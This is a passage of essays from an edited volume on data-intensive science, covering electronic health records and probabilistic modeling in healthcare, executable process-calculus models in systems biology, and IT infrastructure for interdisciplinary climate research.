Healthcare organizations around the world, in both low- and high-resource settings, are deploying EHRs. At the community level, EHRs can be used to manage healthcare services, monitor the public's health, and support research. Furthermore, the social benefits of EHRs may be greater from such population-level uses than from individual care uses. The use of standard terms and ontologies in EHRs is increasing the structure of healthcare data, but clinical coding behavior introduces new potential biases. For example, the introduction of incentives for primary care professionals to tackle particular conditions may lead to fluctuations in the amount of coding of new cases of those conditions [2]. On the other hand, the falling cost of devices for remote monitoring and near-patient testing is leading to more capture of objective measures in EHRs, which can provide less biased signals but may create the illusion of an increase in disease prevalence simply due to more data becoming available. Some patients are beginning to access and supplement their own records or edit a parallel health record online [3]. The stewardship of future health records may indeed be more with individuals (patients/citizens/consumers) and communities (families, local populations, etc.) than with healthcare organizations. In summary, the use of EHRs is producing more data-intensive healthcare environments in which substantially more data are captured and transferred digitally. Computational thinking and models of healthcare to apply to this wealth of data, however, have scarcely been developed.

Biotechnologies

Biotechnologies have fueled a boom in molecular medical research. Some techniques, such as genome-wide analysis, produce large volumes of data without the sampling bias that a purposive selection of study factors might produce. Such datasets are thus more wide-ranging and unselected than conventional experimental measurements.
Important biases can still arise from artifacts in the biotechnical processing of samples and data, but these are likely to decrease as the technologies improve. A greater concern is the systematic error that lies outside the data landscape, for example, in a metabolomic analysis that is confounded by not considering the time of day, or the elapsed time since the most recent meal, when the sample was taken. The integration of different scales of data, from molecular-level to population-level variables, and of different levels of directness of measurement is a grand challenge for data-intensive health science. When realistically complex multi-scale models are available, the next challenge will be to make them accessible to clinicians and patients, who together can evaluate the competing risks of different options for personalizing treatment.

Scientific Outputs

The outputs of health science have been growing exponentially [4]. In 2009, a new paper is indexed in PubMed, the health science bibliographic system, on average every 2 minutes. The literature-review approach to managing health knowledge is therefore potentially overloaded. Furthermore, the translation of new knowledge into practice innovation is slow and inconsistent [5]. This adversely affects not only clinicians and patients who are making care decisions but also researchers who are reasoning about patterns and mechanisms. There is a need to combine the mining of evidence bases with computational models for exploring the burgeoning data from healthcare and research.

Figure 1. Conventional approaches based on statistical hypothesis testing artificially decompose the healthcare domain into numerous sub-problems, with separate expertise, data, hypothesis, statistical testing, and hypothesis refinement pipelines each reaching an independent conclusion. They thereby miss a significant opportunity for statistical borrowing of strength. Chronic obstructive pulmonary disease (COPD), cardiovascular disease (CVD), and lung cancer can be considered together as a "big three" [6].

Hypothesis-driven research and reductionist approaches to causality have served health science well in identifying the major independent determinants of health and the outcomes of individual healthcare interventions. (See Figure 1.) But they do not reflect the complexity of health. For example, clinical trials exclude as many as 80 percent of the situations in which a drug might be prescribed, for example, when a patient has multiple diseases and takes multiple medications [7]. Consider a newly licensed drug released for general prescription. Clinician X might prescribe the drug while clinician Y does not, which could give rise to natural experiments. In a fully developed data-intensive healthcare system in which the data from those experiments are captured in EHRs, clinical researchers could explore the outcomes of patients on the new drug compared with natural controls, and they could potentially adjust for confounding and modifying factors. However, such adjustments might be extremely complex and beyond the capability of conventional models.

Figure 2. We propose a unified approach to healthcare modeling that exploits the growing statistical resources of electronic health records in addition to the data collected for specific studies.
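A minimal sketch of the natural-experiment adjustment mentioned above appears below. The three-variable model, the use of age as the sole confounder, and all probabilities are invented; the point is only to show why naive pooled comparisons mislead and why the far richer graphical models proposed next are needed for realistic EHR data.

```python
# Hypothetical toy model: age confounds both who receives a new drug and the
# chance of a good outcome. All probabilities are invented for illustration.
P_AGE = {"young": 0.6, "old": 0.4}
P_DRUG_GIVEN_AGE = {"young": 0.3, "old": 0.7}     # P(drug | age)
P_GOOD_GIVEN = {                                   # P(good outcome | age, drug)
    ("young", True): 0.80, ("young", False): 0.75,
    ("old", True): 0.55, ("old", False): 0.45,
}

def observed_outcome_rate(drug):
    """Naive pooled comparison, P(good | drug): confounded by age."""
    num = den = 0.0
    for age, p_age in P_AGE.items():
        p_drug = P_DRUG_GIVEN_AGE[age] if drug else 1 - P_DRUG_GIVEN_AGE[age]
        weight = p_age * p_drug
        num += weight * P_GOOD_GIVEN[(age, drug)]
        den += weight
    return num / den

def age_adjusted_outcome_rate(drug):
    """Standardized rate: average P(good | age, drug) over the age distribution."""
    return sum(p_age * P_GOOD_GIVEN[(age, drug)] for age, p_age in P_AGE.items())

for drug in (True, False):
    print("drug" if drug else "control",
          round(observed_outcome_rate(drug), 3),
          round(age_adjusted_outcome_rate(drug), 3))
# The pooled rates make the drug look worse, while the age-adjusted rates
# (0.70 vs. 0.63) show it helping in every age group: a Simpson's-paradox reversal.
```

With one confounder the adjustment is a one-line sum; with the hundreds of interacting clinical, genetic, and environmental factors in real records, it is not, which motivates the unified approach that follows.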
A Unified Approach We propose a unified modeling approach that can take full advantage of a dataintensive environment without losing the realistic complexity of health. (See Figure 2.) Our approach relies on developments within the machine learning field over the past 10 years, which provide powerful new tools that are well suited to this challenge. Knowledge of outcomes, interventions, and confounding or modifying factors can all be captured and represented through the framework of probabilistic graphical models in which the relevant variables, including observed data, are expressed as a graph [8]. Inferences on this graph can then be performed automatically using a variety of algorithms based on local message passing, such as [9]. Compared with classical approaches to machine learning, this new framework offers a deeper integration of domain knowledge, taken directly from experts or from the literature, with statistical learning. Furthermore, these automatic inference algorithms can scale to datasets of hundreds of millions of records, and new tools such 94 as Infer.NET allow rapid development of solutions within this framework [10]. We illustrate the application of this approach with two scenarios. In scenario 1, an epidemiologist is investigating the genetic and environmental factors that predispose some children to develop asthma. He runs a cohort study of 1,000 children who have been followed for 10 years, with detailed environmental and physiological measures as well as data on over half a million of the 3 million genetic factors that might vary between individuals. The conventional epidemiology approach might test predefined hypotheses using selected groups of genetic and other factors. A genome-wide scanning approach might also be taken to look for associations between individual genetic factors and simple definitions of health status (e.g., current wheeze vs. no current wheeze at age 5 years). Both of these approaches use relatively simple statistical models. An alternative machine learning approach might start with the epidemiologist constructing a graphical model of the problem space, consulting literature and colleagues to build a graph around the organizing principlesay, peripheral airways obstruction. This model better reflects the realistic complexity of asthma with a variety of classes of wheeze and other signs and symptoms, and it relates them to known mechanisms. Unsupervised clustering methods are then used to explore how genetic, environmental, and other study factors influence the clustering into different groups of allergic sensitization with respect to skin and blood test results and reports of wheezing. The epidemiologist can relate these patterns to biological pathways, thereby shaping hypotheses to be explored further. In scenario 2, a clinical team is auditing the care outcomes for patients with chronic angina. Subtly different treatment plans of care are common, such as different levels of investigation and treatment in primary care before referral to specialist care. A typical clinical audit approach might debate the treatment plan, consult literature, examine simple summary statistics, generate some hypotheses, and perhaps test the hypotheses using simple regression models. An alternative machine learning approach might construct a graphical model of the assumed treatment plan, via debate and reference to the literature, and compare this with discovered network topologies in datasets reflecting patient outcomes. 
Plausible networks might then be used to simulate the potential effects of changes to clinical practice by running scenarios that change edge weights in the underlying graphs. Thus the families of associations in locally relevant data can be combined with evidence from the literature in a scenario-planning activity that involves clinical reasoning and machine learning. 95 Unified models clearly have the potential to influence personal health choices, clinical practice, and public health. So is this a paradigm for the future? The first paradigm of healthcare information might be considered to be the case history plus expert physician, formalized by Hippocrates more than 2,000 years ago and still an important part of clinical practice. In the second paradigm, a medical record is shared among a set of complementary clinicians, each focusing their specialized knowledge on the patients condition in turn. The third paradigm is evidence-based healthcare that links a network of health professionals with knowledge and patient records in a timely manner. This third paradigm is still in the process of being realized, particularly in regard to capturing the complexities of clinical practice in a digital record and making some aspects of healthcare computable. We anticipate a fourth paradigm of healthcare information, mirroring that of other disciplines, whereby an individuals health data are aggregated from multiple sources and attached to a unified model of that persons health. The sources can range from body area network sensors to clinical expert oversight and interpretation, with the individual playing a much greater part than at present in building and acting on his or her health information. Incorporating all of this data, the unified model will take on the role of a health avatarthe electronic representation of an individuals health as directly measured or inferred by statistical models or clinicians. Clinicians interacting with a patients avatar can achieve a more integrated view of different specialist treatment plans than they do with care records alone. The avatar is not only a statistical tool to support diagnosis and treatment, but it is also a communication tool that links the patient and the patients elected network of clinicians and other trusted caregiversfor what-if treatment discussions, for example. While initially acting as a fairly simple multi-system model, the health avatar could grow in depth and complexity to narrow the gap between avatar and reality. Such an avatar would not involve a molecular-level simulation of a human being (which we view as implausible) but would instead involve a unified statistical model that captures current clinical understanding as it applies to an individual patient. This paradigm can be extended to communities, where multiple individual avatars interact with a community avatar to provide a unified model of the communitys health. Such a community avatar could provide relevant and timely information for use in protecting and improving the health of those in the community. Scarce community resources could be matched more accurately to lifetime healthcare needs, 96 particularly in prevention and early intervention, to reduce the severity and/or duration of illness and to better serve the community as a whole. Clinical, consumer, and public health services could interact more effectively, providing both social benefit and new opportunities for healthcare innovation and enterprise. Conclusion Data alone cannot lead to data-intensive healthcare. 
A substantial overhaul of methodology is required to address the real complexity of health, ultimately leading to dramatically improved global public healthcare standards. We believe that machine learning, coupled with a general increase in computational thinking about health, can be instrumental. There is arguably a societal duty to develop computational frameworks for seeking signals in collections of health data if the potential benefit to humanity greatly outweighs the risk. We believe it does.

References

[1] J. Powell and I. Buchan, "Electronic health records should support clinical research," J. Med. Internet Res., vol. 7, no. 1, p. e4, Mar. 14, 2005, doi: 10.2196/jmir.7.1.e4.
[2] S. de Lusignan, N. Hague, J. van Vlymen, and P. Kumarapeli, "Routinely-collected general practice data are complex, but with systematic processing can be used for quality improvement and research," Prim. Care Inform., vol. 14, no. 1, pp. 59-66, 2006.
[3] L. Bos and B. Blobel, Eds., Medical and Care Compunetics 4, vol. 127 in the Studies in Health Technology and Informatics series. Amsterdam: IOS Press, pp. 311-315, 2007.
[4] B. G. Druss and S. C. Marcus, "Growth and decentralization of the medical literature: implications for evidence-based medicine," J. Med. Libr. Assoc., vol. 93, no. 4, pp. 499-501, Oct. 2005, PMID: PMC1250328.
[5] A. Mina, R. Ramlogan, G. Tampubolon, and J. Metcalfe, "Mapping evolutionary trajectories: Applications to the growth and transformation of medical knowledge," Res. Policy, vol. 36, no. 5, pp. 789-806, 2007, doi: 10.1016/j.respol.2006.12.007.
[6] M. Gerhardsson de Verdier, "The Big Three Concept - A Way to Tackle the Health Care Crisis?" Proc. Am. Thorac. Soc., vol. 5, pp. 800-805, 2008.
[7] M. Fortin, J. Dionne, G. Pinho, J. Gignac, J. Almirall, and L. Lapointe, "Randomized controlled trials: do they have external validity for patients with multiple comorbidities?" Ann. Fam. Med., vol. 4, no. 2, pp. 104-108, Mar.-Apr. 2006, doi: 10.1370/afm.516.
[8] C. Bishop, Pattern Recognition and Machine Learning. Springer, 2006.
[9] J. Winn and C. Bishop, "Variational Message Passing," J. Mach. Learn. Res., vol. 6, pp. 661-694, 2005.
[10] T. Minka, J. Winn, J. Guiver, and A. Kannan, Infer.NET, Microsoft Research Cambridge.

HEALTH AND WELLBEING

Luca Cardelli, Microsoft Research
Corrado Priami, Microsoft Research - University of Trento Centre for Computational and Systems Biology, and University of Trento

In a recent paper, Nobel laureate Paul Nurse calls for a better understanding of living organisms through both the development of the appropriate languages to describe information processing in biological systems and the generation of more effective methods to translate biochemical descriptions into the functioning of the logic circuits that underpin biological phenomena [1]. The language that Nurse wishes to see is a formal language that can be automatically translated into machine-executable code and that enables simulation and analysis techniques for proving properties of biological systems. Although there are many approaches to the formal modeling of living systems, only a few provide executable descriptions that highlight the mechanistic steps that make a system move from one state to another [2]. Almost all the techniques related to mathematical modeling abstract away from these individual steps to produce global behavior, usually averaged over time. Computer science provides the key elements to describe mechanistic steps: algorithms and programming languages [3].
Following the metaphor of "molecules as processes" introduced in [4], process calculi have been identified as a promising tool to model biological systems that are inherently complex, concurrent, and driven by the interactions of their subsystems.

Causality is a key difference between language-based modeling approaches and other techniques. In fact, causality in concurrent languages is strictly related to the notion of concurrency, or independence of events, which makes causality substantially different from temporal ordering. An activity A causes an activity B if A is a necessary condition for B to happen and A influences the activity of B, i.e., there is a flow of information from A to B. The second part of this condition makes clear the distinction between precedence (related only to temporal ordering) and causality (a subset of the temporal ordering in which the flow of information is also considered) [5]. As a consequence, the list of the reactions performed by a system provides only temporal information, not causal information. It is therefore mandatory to devise new modeling and analysis tools to address causality. Causality is a key issue in the analysis of complex interacting systems because it helps in dissecting independent components and simplifying models while also allowing us to clearly identify cross-talk between different signaling cascades. Once the experimentalist observes an interesting event in a simulation, it is possible to compact the previous history of the system, exposing only the preceding events that caused the interesting one. This can give precise hints about the causes of a disease, the interaction of a drug with a living system (identifying its efficacy and its side effects), and the regulatory mechanisms of oscillating behaviors. Causality is a relationship between events, and as such it is most naturally studied within discrete models, which are in turn described via algorithmic modeling languages.

Although many modeling languages have been defined in computer science to model concurrent systems, many challenges remain in building algorithmic models for the system-level understanding of biological processes. These challenges include the relationship between low-level local interactions and emergent high-level global behavior; the incomplete knowledge of the systems under investigation; the multi-level and multi-scale representations in time, space, and size; and the causal relations between interactions and the context awareness of the inner components. Therefore, the modeling formalisms that are candidates to propel algorithmic systems biology should be complementary to and interoperable with mathematical modeling. They should address parallelism and complexity, be algorithmic and quantitative, express causality, and be interaction driven, composable, scalable, and modular.

Language Visualization and Usability

A modeling language must be understandable by biologists so they can relate it to their own informal models and to experiments. One attempt by biologists to connect formal languages and informal descriptions of systems involved the use of a constrained natural language organized in the form of tables that collect all the information related to the structure and dynamics of a system. This narrative representation is informative and structured enough to be compiled into a formal description that is amenable to simulation and analysis [6, 7].
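The precedence-versus-causality distinction drawn earlier in this section can be made concrete with a small sketch: given a hypothetical list of reactions from a simulation trace, causal dependencies are recovered by tracking which earlier reaction produced the species a later reaction consumes. The species and reaction names are invented, and this direct-dependency rule is only a simplified illustration of the idea, not the semantics of any particular calculus.

```python
# A hypothetical simulation trace: (reaction name, consumed species, produced species).
trace = [
    ("r1", {"A"}, {"B"}),        # r1: A -> B
    ("r2", {"C"}, {"D"}),        # r2: C -> D  (temporally after r1, but independent)
    ("r3", {"B", "D"}, {"E"}),   # r3: B + D -> E
]

def causal_predecessors(trace):
    """Direct causal dependencies: a reaction depends on the earlier reactions
    that produced the species it consumes (a flow of information), which is a
    strict subset of plain temporal precedence."""
    produced_by = {}   # species -> name of the most recent reaction producing it
    causes = {}
    for name, consumed, produced in trace:
        causes[name] = {produced_by[s] for s in consumed if s in produced_by}
        for s in produced:
            produced_by[s] = name
    return causes

print(causal_predecessors(trace))
# {'r1': set(), 'r2': set(), 'r3': {'r1', 'r2'}}
# r1 temporally precedes r2, yet neither causes the other; only r3 depends on both.
```

Compacting a history to "only the events that caused the interesting one," as described above, amounts to taking the transitive closure of these dependencies backwards from the event of interest.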
Although the narrative modeling style is not yet visual, it is certainly more readable and corresponds better to the intuition of biologists than a formal (programming) language. The best way to make a language understandable to scientists while also helping to manage complexity is to visualize the language. This is harder than visualizing data or visualizing the results of simulations because a language implicitly describes the full kinetics of a system, including the dynamic relationships between events. Therefore, language visualization must be dynamic, and possibly reactive [8], which means that a scientist should be able to detect and insert events in a running simulation by direct intervention. This requires a one-to-one correspondence between the internal execution of a formal language and its visualization so that the kinetics of the language can be fully reflected in the kinetics of the visualization and vice versa. This ability to fully match the kinetics of a general (Turing-complete) modeling language to visual representations has been demonstrated, for example, for picalculus [9], but many practical challenges remain to adapting such general methods to specific visualization requirements. (See Figure 1 on the next page.) One such requirement, for example, is the visualization and tracking of molecular complexes; to this end, the BlenX language [10] and its support tools permit explicit representation of complexes of biological elements and examination of their evolution in time [11]. (See Figure 2 on page 103.) The graphical representation of complexes is also useful in studying morphogenesis processes to unravel the mechanistic steps of pattern formation. (See Figure 3 on page 104.) Analysis Model construction is one step in the scientific cycle, and appropriate modeling languages (along with their execution and visualization capabilities) are important, particularly for modeling complex systems. Ultimately, however, one will want to analyze the model using a large number of techniques. Some of these techniques may be centered on the underlying mathematical framework, such as the analysis of 101 differential equations, Markov chains, or Petri nets generated from the modproduceM degradeM el. Other techniques may be centered +tpn on the model description (the language in which the model is written). M TM -tpnv For example, we may want to know whether two different model descrip+pep -pep +pepa -pepq tions actually represent the same behavior, by some measure of behavior equivalence. This kind of model cor-tpn respondence can arise, for example, MP TMP from apparently different biological systems that work by the same fundaegress mental principles. A similar question is whether we can simplify (abstract) a model description and still preserve degrade its behavior, again by some measure of MeP behavior equivalence that may mask some unimportant detail. Behavioral equivalences are in fact Figure 1. a primary tool in computer science This diagram can be placed in 1:1 corresponfor verifying computing systems. For dence with formal stochastic pi-calculus models [9, 12, 13] so that one can edit either the instance, we can use equivalences to diagrams or the models. The nodes represent ensure that an implementation is in molecular states (the node icons are just for agreement with a specification, abillustration), and the labeled arcs represent stracting as much as possible from interactions with other molecules in the envisyntactic descriptions and instead foronment. 
So far, biology has focused on syntactic relationships between genes, genomes, and proteins. An entirely new avenue of research is the investigation of the semantic equivalences of biological entities populating complex networks of interactions. This approach could lead to new visions of systems and reinforce the need for computer science to enhance systems biology.

Biology is a data-intensive science. Biological systems are huge collections of interacting components. The last decade of research has contributed to identifying and classifying those components, especially at the molecular level (genes, metabolites, proteins). To make sense of the large amount of data available, we need to implicitly represent them in compact and executable models so that executions can recover the available data as needed. This approach would merge syntax and semantics in unifying representations and would create the need for different ways of storing, retrieving, and comparing data. A model repository that represents the dynamics of biological processes in a compact and mechanistic manner would therefore be extremely valuable and could heighten the understanding of biological data and the basic biological principles governing life. This would facilitate predictions and the optimal design of further experiments to move from data collection to knowledge production.

Figure 2. The green S boxes in the diagram represent entities populating the biological system under consideration. The light blue rectangles attached to the green boxes represent the active interfaces/domains available for complexation and decomplexation. The diagram shows how the simulation of the BlenX specification formed a ring complex and provides the position and the connections between boxes for inspection.

Figure 3. The green, red, and blue S boxes in the diagram represent different species populating the biological system under consideration. The light blue rectangles attached to the boxes represent the active interfaces/domains available for complexation and decomplexation. The diagram elucidates how patterns are formed in morphogenesis processes simulated by BlenX specifications.

Analysis Visualization

Executable models need visualization to make their execution interactive (to dynamically focus on specific features) and reactive (to influence their execution on the fly). Execution is one form of analysis; other analysis methods will need visualization as well. For complex systems, the normal method of batch analysis, consisting of running a complex analysis on the model and then mining the output for clues, needs to be replaced with a more interactive, explorative approach. Model abstraction is an important tool for managing complexity, and we can envision performing this activity interactively, for example, by lumping components together or by hiding components. The notion of lumping will then need an appropriate visualization and an appropriate way of relating the behavior of the original components to the behavior of the lumped components. This does not mean visualizing the modeling language, but rather visualizing an abstraction function between models.
We therefore suggest visualizing the execution of programs/models in such a way that the output is linked to the source code/model specification and the graphical abstraction performed by the end user is transformed into a formal program/model transformation. The supporting tool would then check which properties the transformation is preserving or not preserving and warn the user accordingly.

All the above reinforces the need for a formal and executable language to model biology as the core feature of an in silico laboratory for biologists that could be the next-generation high-throughput tool for biology.

Acknowledgments

The authors thank Andrew Phillips and Lorenzo Dematté for preparing the figures.

References

[1] P. Nurse, Life, Logic and Information, Nature, vol. 454, pp. 424-426, 2008, doi: 10.1038/454424a.
[2] J. Fisher and T. Henzinger, Executable Cell Biology, Nature Biotechnology, vol. 25, pp. 1239-1249, 2007, doi: 10.1038/nbt1356.
[3] C. Priami, Algorithmic Systems Biology: An opportunity for computer science, Commun. ACM, June 2009, doi: 10.1145/1506409.1506427.
[4] A. Regev and E. Shapiro, Cells as computation, Nature, vol. 419, p. 343, 2002, doi: 10.1038/419343a.
[5] P. Degano and C. Priami, Non-interleaving semantics of mobile processes, Theor. Comp. Sci., vol. 216, no. 1-2, pp. 237-270, 1999.
[6] M. L. Guerriero, J. Heath, and C. Priami, An automated translation from a narrative language for biological modelling into process algebra, Proc. of CMSB 2007, LNBI 4695, 2007, pp. 136-151, doi: 10.1007/978-3-540-75140-3_10.
[7] M. L. Guerriero, A. Dudka, N. Underhill-Day, J. Heath, and C. Priami, Narrative-based computational modelling of the Gp130/JAK/STAT signalling pathway, BMC Syst. Biol., vol. 3, no. 1, p. 40, 2009, doi: 10.1186/1752-0509-3-40.
[8] S. Efroni, D. Harel, and I. R. Cohen, Reactive Animation: Realistic Modeling of Complex Dynamic Systems, Computer, vol. 38, no. 1, pp. 38-47, Jan. 2005, doi: 10.1109/MC.2005.31.
[9] A. Phillips, L. Cardelli, and G. Castagna, A Graphical Representation for Biological Processes in the Stochastic Pi-calculus, Trans. Comput. Syst. Biol. VII, LNCS 4230, 2006, pp. 123-152, doi: 10.1007/11905455_7.
[10] L. Dematté, C. Priami, and A. Romanel, The BlenX Language: a tutorial, Formal Meth. Comput. Syst. Biol., LNCS 5016, 2008, pp. 313-365.
[11] L. Dematté, C. Priami, and A. Romanel, The Beta Workbench: a computational tool to study the dynamics of biological systems, Brief Bioinform, vol. 9, no. 5, pp. 437-449, 2008, doi: 10.1093/bib/bbn023.
[12] C. Priami, Stochastic pi-calculus, Comp. J., vol. 38, no. 6, pp. 578-589, 1995, doi: 10.1093/comjnl/38.7.578.
[13] A. Phillips and L. Cardelli, Efficient, Correct Simulation of Biological Processes in Stochastic Pi-calculus, Proc. Comput. Meth. Syst. Biol., Edinburgh, 2007, pp. 184-199, doi: 10.1007/978-3-540-75140-3_13.

3. SCIENTIFIC INFRASTRUCTURE

Introduction

The articles in Part 3 of this book use a range of dramatic metaphors, such as explosion, tsunami, and even the big bang, to strikingly illustrate how scientific research will be transformed by the ongoing creation and availability of high volumes of scientific data. Although the imagery may vary, these authors share a common intent by addressing how we must adjust our approach to computational science to handle this new proliferation of data.
Their choice of words is motivated by the opportunity for research breakthroughs afforded by these large and rich datasets, but it also implies the magnitude of our culture's loss if our research infrastructure is not up to the task.

Abbott's perspective across all of scientific research challenges us with a fundamental question: whether, in light of the proliferation of data and its increasing availability, the need for sharing and collaboration, and the changing role of computational science, there should be a new path for science. He takes a pragmatic view of how the scientific community will evolve, and he is skeptical about just how eager researchers will be to embrace techniques such as ontologies and other semantic technologies. While avoiding dire portents, Abbott is nonetheless vivid in characterizing a disconnect between the supply of scientific knowledge and the demands of the private and government sectors.

To bring the issues into focus, Southan and Cameron explore the tsunami of data growing in the EMBL-Bank database, a nucleotide sequencing information service. Throughout Part 3 of this book, the field of genetic sequencing serves as a reasonable proxy for a number of scientific domains in which the rate of data production is brisk (in this case, a 200% increase per annum), leading to major challenges in data aggregation, workflow, backup, archiving, quality, and retention, to name just a few areas.

Larus and Gannon inject optimism by noting that the data volumes are tractable through the application of multicore technologies, provided, of course, that we can devise the programming models and abstractions to make this technical innovation effective in general-purpose scientific research applications. Next, we revisit the metaphor of a calamity induced by a data tidal wave as Gannon and Reed discuss how parallelism and the cloud can help with scalability issues for certain classes of computational problems.

From there, we move to the role of computational workflow tools in helping to orchestrate key tasks in managing the data deluge. Goble and De Roure identify the benefits and issues associated with applying computational workflow to scientific research and collaboration. Ultimately, they argue that workflows illustrate the primacy of method as a crucial technology in data-centric research.

Fox and Hendler see semantic eScience as vital in helping to interpret interrelationships of complex concepts, terms, and data. After explaining the potential benefits of semantic tools in data-centric research, they explore some of the challenges to their smooth adoption. They note the inadequate participation of the scientific community in developing requirements as well as a lack of coherent discussion about the applicability of Web-based semantic technologies to the scientific process.

Next, Hansen et al. provide a lucid description of the hurdles to visualizing large and complex datasets. They wrestle with the familiar topics of workflow, scalability, application performance, provenance, and user interactions, but from a visualization standpoint. They highlight that current analysis and visualization methods lag far behind our ability to create data, and they conclude that multidisciplinary skills are needed to handle diverse issues such as automatic data interpretation, uncertainty, summary visualizations, verification, and validation.
Completing our journey through these perils and opportunities, Parastatidis considers how we can realize a comprehensive knowledge-based research infrastructure for science. He envisions this happening through a confluence of traditional scientific computing tools, Web-based tools, and select semantic methods.

The scientific challenges of the 21st century will strain the partnerships between government, industry, and academia that have developed and matured over the last century or so. For example, in the United States, beginning with the establishment of the National Science Foundation in 1950, the nation's research university system has blossomed and now dominates the basic research segment. (The applied research segment, which is far larger, is primarily funded and implemented within the private sector.) One cannot overstate the successes of this system, but it has come to be largely organized around individual science disciplines and rewards individual scientists' efforts through publications and the promotion and tenure process. Moreover, the eternal restlessness of the system means that researchers are constantly seeking new ideas and new funding [1, 2]. An unexpected outcome of this system is the growing disconnect between the supply of scientific knowledge and the demand for that knowledge from the private and government sectors [3, 4]. The internal reward structure at universities, as well as the peer review system, favors research projects that are of inherent interest to the scientific community but not necessarily to those outside the academic community.

New Drivers

It is time to reexamine the basic structures underlying our research enterprise. For example, given the emerging and urgent need for new approaches to climate and energy research in the broad context of sustainability, fundamental research on the global climate system will continue to be necessary, but businesses and policymakers are asking questions that are far more interdisciplinary than in the past. This new approach is more akin to scenario development in support of risk assessment and management than traditional problem solving and the pursuit of knowledge for its own sake. In climate science, the demand side is focused on feedback between climate change and socioeconomic processes, rare (but high-impact) events, and the development of adaptive policies and management protocols. The science supply side favors studies of the physical and biological aspects of the climate system on a continental or global scale and reducing uncertainties (e.g., [5]). This misalignment between supply and demand hampers society's ability to respond effectively and in a timely manner to the changing climate.

Recent History

The information technology (IT) infrastructure of 25 years ago was well suited to the science culture of that era. Data volumes were relatively small, and therefore each data element was precious. IT systems were relatively expensive and were accessible only to experts. The fundamental workflow relied on a data collection system (e.g., a laboratory or a field sensor), transfer into a data storage system, data processing and analysis, visualization, and publication. Figure 1 shows the architecture of NASA's Earth Observing System Data and Information System (EOSDIS) from the late 1980s.
Although many thought that EOSDIS was too ambitious (it planned for 1 terabyte per day of data), the primary argument against it was that it was too centralized for a system that needed to be science driven. EOSDIS was perceived to be a data factory, operating under a set of rigorous requirements with little opportunity for knowledge or technology infusion. Ultimately, the argument was not about centralized versus decentralized but rather who would control the requirements: the science community or the NASA contractor. The underlying architecture, with its well-defined (and relatively modest-sized) data flows and mix of centralized and distributed components, has remained undisturbed, even as the World Wide Web, the Internet, and the volume of online data have grown exponentially.

Figure 1. NASA's Earth Observing System Data and Information System (EOSDIS) as planned in 1989.

Today, the suite of national supercomputer centers as well as the notion of cloud computing looks much the same as the architecture shown in Figure 1. It doesn't matter whether the network connection is an RS-232 asynchronous connection, a dial-up modem, or a gigabit network, or whether the device on the scientist's desktop is a VT100 graphics terminal or a high-end multicore workstation. Virtualized (but distributed) repositories of data storage and computing capabilities are accessed via network by relatively low-capability devices.

Moore's Law has had 25 years to play out since the design of EOSDIS. Although we generally focus on the increases in capacity and the precipitous decline in the price/performance ratio, the pace of rapid technological innovation has placed enormous pressure on the traditional modes of scientific research. The vast amounts of data have greatly reduced the value of an individual data element, and we are no longer data-limited but insight-limited. "Data-intensive" should not refer just to the centralized repositories but also to the far greater volumes of data that are network-accessible in offices, labs, and homes and by sensors and portable devices. Thus, data-intensive computing should be considered more than just the ability to store and move larger amounts of data. The complexity of these new datasets as well as the increasing diversity of the data flows is rendering the traditional compute/datacenter model obsolete for modern scientific research.

Implications for Science

IT has affected the science community in two ways. First, it has led to the commoditization of generic storage and computing. For science tasks that can be accomplished through commodity services, such services are a reasonable option. It will always be more cost effective to use low-profit-margin, high-volume services through centralized mechanisms such as cloud computing. Thus more universities are relying on such services for data backup, e-mail, office productivity applications, and so on. The second way that IT has affected the science community is through radical personalization. With personal access to teraflops of computing and terabytes of storage, scientists can create their own compute clouds. Innovation and new science services will come from the edges of the networks, not the commodity-driven datacenters. Moreover, not just scientists but the vastly larger number of sensors and laboratory instruments will soon be connected to the Internet with their own local computation and storage services.
The challenge is to harness the power of this new network of massively distributed knowledge services. Today, scientific discovery is not accomplished solely through the well-defined, rigorous process of hypothesis testing. The vast volumes of data, the complex and hard-to-discover relationships, the intense and shifting types of collaboration between disciplines, and new types of near-real-time publishing are adding pattern and rule discovery to the scientific method [6]. Especially in the area of climate science and policy, we could see a convergence of this new type of data-intensive research and the new generation of IT capabilities. The alignment of science supply and demand in the context of continuing scientific uncertainty will depend on seeking out new relationships, overcoming language and cultural barriers to enable collaboration, and merging models and data to evaluate scenarios. This process has far more in common with network gaming than with the traditional scientific method. Capturing the important elements of data preservation, collaboration, provenance, and accountability will require new approaches in the highly distributed, data-intensive research community. Instead of well-defined data networks and factories coupled with an individually based publishing system that relies on peer review and tenure, this new research enterprise will be more unruly and less predictable, resembling an ecosystem in its approach to knowledge discovery. That is, it will include loose networks of potential services, rapid innovation at the edges, and a much closer partnership between those who create knowledge and those who use it. As with every ecosystem, emergent (and sometimes unpredictable) behavior will be a dominant feature.

Our existing institutions, including federal agencies and research universities, will be challenged by these new structures. Access to data and computation as well as new collaborators will not require the physical structure of a university or millions of dollars in federal grants. Moreover, the rigors of tenure and its strong emphasis on individual achievement in a single scientific discipline may work against these new approaches. We need an organization that integrates natural science with socioeconomic science, balances science with technology, focuses on systems thinking, supports flexible and interdisciplinary approaches to long-term problem solving, integrates knowledge creation and knowledge use, and balances individual and group achievement. Such a new organization could pioneer integrated approaches to a sustainable future, approaches that are aimed at understanding the variety of possible futures. It would focus on global-scale processes that are manifested on a regional scale with pronounced socioeconomic consequences. Rather than a traditional academic organization with its relatively static set of tenure-track professors, a new organization could take more risks, build and develop new partnerships, and bring in people with the talent needed for particular tasks. Much like in the U.S. television series Mission Impossible, we will bring together people from around the world to address specific problems, in this case climate change issues.

Making It Happen

How can today's IT enable this type of new organization and this new type of science? In the EOSDIS era, it was thought that relational databases would provide the essential services needed to manage the vast volumes of data coming from the EOS satellites.
Although database technology provided the baseline services needed for the standard EOS data products, it did not capture the innovation at the edges of the system where science was in control. Today, semantic webs and ontologies are being proposed as a means to enable knowledge discovery and collaboration. However, as with databases, it is likely that the science community will be reluctant to use these inherently complex tools except for the most mundane tasks. Ultimately, digital technology can provide only relatively sparse descriptions of the richness and complexity of the real world. Moreover, seeking the unusual and unexpected requires creativity and insight, processes that are difficult to represent in a rigid digital framework. On the other hand, simply relying on PageRank-like statistical correlations based on usage will not necessarily lead to detection of the rare and the unexpected. However, new IT tools for the data-intensive world can provide the ability to filter these data volumes down to a manageable level as well as provide visualization and presentation services to make it easier to gain creative insights and build collaborations. The architecture for data-intensive computing should be based on storage, computing, and presentation services at every node of an interconnected network. Providing standard, extensible frameworks that accommodate innovation at the network edges should enable these knowledge ecosystems to form and evolve as the needs of climate science and policy change.

References

